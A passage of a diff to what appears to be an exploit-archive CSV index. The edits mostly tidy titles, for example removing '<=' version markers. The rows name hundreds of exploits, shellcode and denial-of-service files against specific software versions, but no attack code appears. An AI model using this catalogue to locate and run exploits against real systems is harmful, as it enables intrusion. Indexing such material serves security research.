Invalid FTP Command DoS",2000-07-19,"Peter Grundl",hardware,dos,0 @@ -17501,7 +17501,7 @@ id,file,description,date,author,platform,type,port 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 -20166,platforms/php/webapps/20166.txt,"Joomla com_niceajaxpoll <= 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0 +20166,platforms/php/webapps/20166.txt,"Joomla com_niceajaxpoll 1.3.0 - SQL Injection",2012-08-01,NLSecurity,php,webapps,0 20167,platforms/linux/dos/20167.txt,"eGlibc Signedness Code Execution",2012-08-01,c0ntex,linux,dos,0 20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) SQL Injection",2012-08-01,D4NB4R,php,webapps,0 @@ -17531,7 +17531,7 @@ id,file,description,date,author,platform,type,port 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd & /etc/shadow shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20197,platforms/php/webapps/20197.txt,"joomla joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 -20198,platforms/php/webapps/20198.txt,"am4ss <= 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 +20198,platforms/php/webapps/20198.txt,"am4ss 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 PHP Code Injection Exploit",2012-08-02,i-Hmx,php,webapps,0 20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal (3)",2000-10-17,zipo,windows,remote,0 @@ -17671,7 +17671,7 @@ id,file,description,date,author,platform,type,port 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0 20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 -20342,platforms/php/webapps/20342.php,"WespaJuris <= 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 +20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 20345,platforms/php/webapps/20345.txt,"iauto mobile application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 @@ -17745,7 +17745,7 @@ id,file,description,date,author,platform,type,port 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - (.wms) Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0 -20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin <= 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 +20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Local Root Exploit (1)",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 @@ -17862,11 +17862,11 @@ id,file,description,date,author,platform,type,port 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload",2012-08-15,ICheer_No0M,php,webapps,0 -20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 +20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 -20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 +20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 20547,platforms/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 @@ -17897,11 +17897,11 @@ id,file,description,date,author,platform,type,port 20574,platforms/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS",2001-02-06,"Georgi Guninski",windows,dos,0 -20576,platforms/php/webapps/20576.txt,"Inferno vBShout <= 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 +20576,platforms/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial of Service",2001-02-19,"J.K. Garvey",hardware,dos,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail - Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 -20580,platforms/php/webapps/20580.txt,"webid <= 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 +20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal",2001-02-05,joetesta,windows,remote,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local,0 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String",2001-01-21,CyRaX,windows,remote,0 @@ -18018,7 +18018,7 @@ id,file,description,date,author,platform,type,port 20695,platforms/multiple/remote/20695.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (4)",2001-06-13,farm9,multiple,remote,0 20696,platforms/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x IMAP DoS",2001-03-23,nitr0s,windows,dos,0 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0 -20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 +20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi",2012-08-21,loneferret,php,webapps,0 20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",windows,remote,0 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 @@ -18028,8 +18028,8 @@ id,file,description,date,author,platform,type,port 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0 -20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 -20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 +20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 +20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 @@ -18063,7 +18063,7 @@ id,file,description,date,author,platform,type,port 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation",2001-04-13,"RA-Soft Security",cgi,remote,0 20753,platforms/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",cgi,dos,0 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0 -20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 +20762,platforms/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS",2001-04-16,"SecureXpert Labs",windows,dos,0 20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,Metasploit,windows,remote,0 20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 @@ -18173,8 +18173,8 @@ id,file,description,date,author,platform,type,port 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow PoC",2012-08-28,LiquidWorm,windows,dos,0 -20871,platforms/php/webapps/20871.txt,"CommPort <= 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 -20872,platforms/php/webapps/20872.txt,"mieric addressBook <= 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps,0 +20871,platforms/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 +20872,platforms/php/webapps/20872.txt,"mieric addressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps,0 20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF",2012-08-28,DaOne,php,webapps,0 20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF",2012-08-28,DaOne,php,webapps,0 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 @@ -18331,21 +18331,21 @@ id,file,description,date,author,platform,type,port 21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password",2001-07-26,John,windows,remote,0 21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 -21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0 +21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos,0 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 -21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - Remote SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 +21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 NT4ALL DoS",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,Metasploit,php,webapps,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3_ greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 -21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 +21053,platforms/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 @@ -18373,7 +18373,7 @@ id,file,description,date,author,platform,type,port 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation",2012-09-05,Metasploit,php,webapps,0 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,Metasploit,multiple,remote,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 -21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 +21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,Metasploit,windows,local,0 @@ -18506,7 +18506,7 @@ id,file,description,date,author,platform,type,port 21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local,0 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",linux,local,0 -21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite <= 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 +21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component (index.php module parameter) Blind SQLi",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0 @@ -18526,7 +18526,7 @@ id,file,description,date,author,platform,type,port 21238,platforms/osx/remote/21238.txt,"Apple MacOS Internet Explorer 3/4/5 File Execution",2002-01-22,"Jass Seljamaa",osx,remote,0 21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP .Manifest Denial of Service",2002-01-21,mosestycoon,windows,dos,0 -21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Include",2002-01-02,"Scott Moonen",php,webapps,0 +21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps,0 21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,linux,remote,0 21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 @@ -18606,7 +18606,7 @@ id,file,description,date,author,platform,type,port 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow",2012-09-17,"Francis Provencher",windows,dos,0 -21327,platforms/php/webapps/21327.txt,"webERP <= 4.08.4 - WorkOrderEntry.php SQL Injection",2012-09-17,modpr0be,php,webapps,0 +21327,platforms/php/webapps/21327.txt,"webERP 4.08.4 - WorkOrderEntry.php SQL Injection",2012-09-17,modpr0be,php,webapps,0 21329,platforms/php/webapps/21329.txt,"Auxilium PetRatePro - Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps,0 21330,platforms/php/webapps/21330.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",php,webapps,0 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 @@ -18620,7 +18620,7 @@ id,file,description,date,author,platform,type,port 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 -21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Include",2002-03-13,b0iler,php,webapps,0 +21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Inclusion",2002-03-13,b0iler,php,webapps,0 21344,platforms/windows/local/21344.txt,"Microsoft Windows 2000 / NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",unix,dos,0 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",windows,dos,0 @@ -18731,7 +18731,7 @@ id,file,description,date,author,platform,type,port 21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote,0 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0 21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 -21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Include",2002-05-12,frog,php,webapps,0 +21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,php,webapps,0 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x DSNManager Directory Traversal",2002-05-17,hdlkha,asp,webapps,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 21457,platforms/asp/webapps/21457.txt,"Hosting Controller 1.4 Import Root Directory Command Execution",2002-05-17,hdlkha,asp,webapps,0 @@ -18798,14 +18798,14 @@ id,file,description,date,author,platform,type,port 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21520,platforms/linux/remote/21520.py,"QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,linux,remote,0 +21520,platforms/linux/remote/21520.py,"QNX 6.5.0 / QCONN 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,linux,remote,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 SQL Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21528,platforms/php/webapps/21528.txt,"Geeklog 1.3.5 Calendar Event Form Script Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Include",2002-06-10,frog,php,webapps,0 +21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Inclusion",2002-06-10,frog,php,webapps,0 21530,platforms/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 File Disclosure",2002-06-08,"Kistler Ueli",windows,remote,0 21531,platforms/unix/dos/21531.txt,"Caldera OpenServer 5.0.x XSCO Color Database File Heap Overflow",2002-06-11,kf,unix,dos,0 21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 @@ -18839,8 +18839,8 @@ id,file,description,date,author,platform,type,port 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",multiple,remote,0 21561,platforms/hardware/dos/21561.txt,"ZyXEL Prestige 642R - Malformed Packet Denial of Service",2002-07-17,"Kistler Ueli",hardware,dos,0 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 File Disclosure",2002-06-17,"Andrew Badr",java,webapps,0 -21563,platforms/php/webapps/21563.txt,"OSCommerce 2.1 - Remote File Include",2002-06-16,"Tim Vandermeerch",php,webapps,0 -21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e Remote File Include",2002-06-17,"Tim Vandermeerch",php,webapps,0 +21563,platforms/php/webapps/21563.txt,"OSCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0 +21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps,0 21565,platforms/unix/local/21565.pl,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local,0 21566,platforms/unix/local/21566.c,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0 21567,platforms/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution",2002-06-06,"NERF Security",cgi,webapps,0 @@ -18935,12 +18935,12 @@ id,file,description,date,author,platform,type,port 21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 Administrative Access",2002-07-29,"Arek 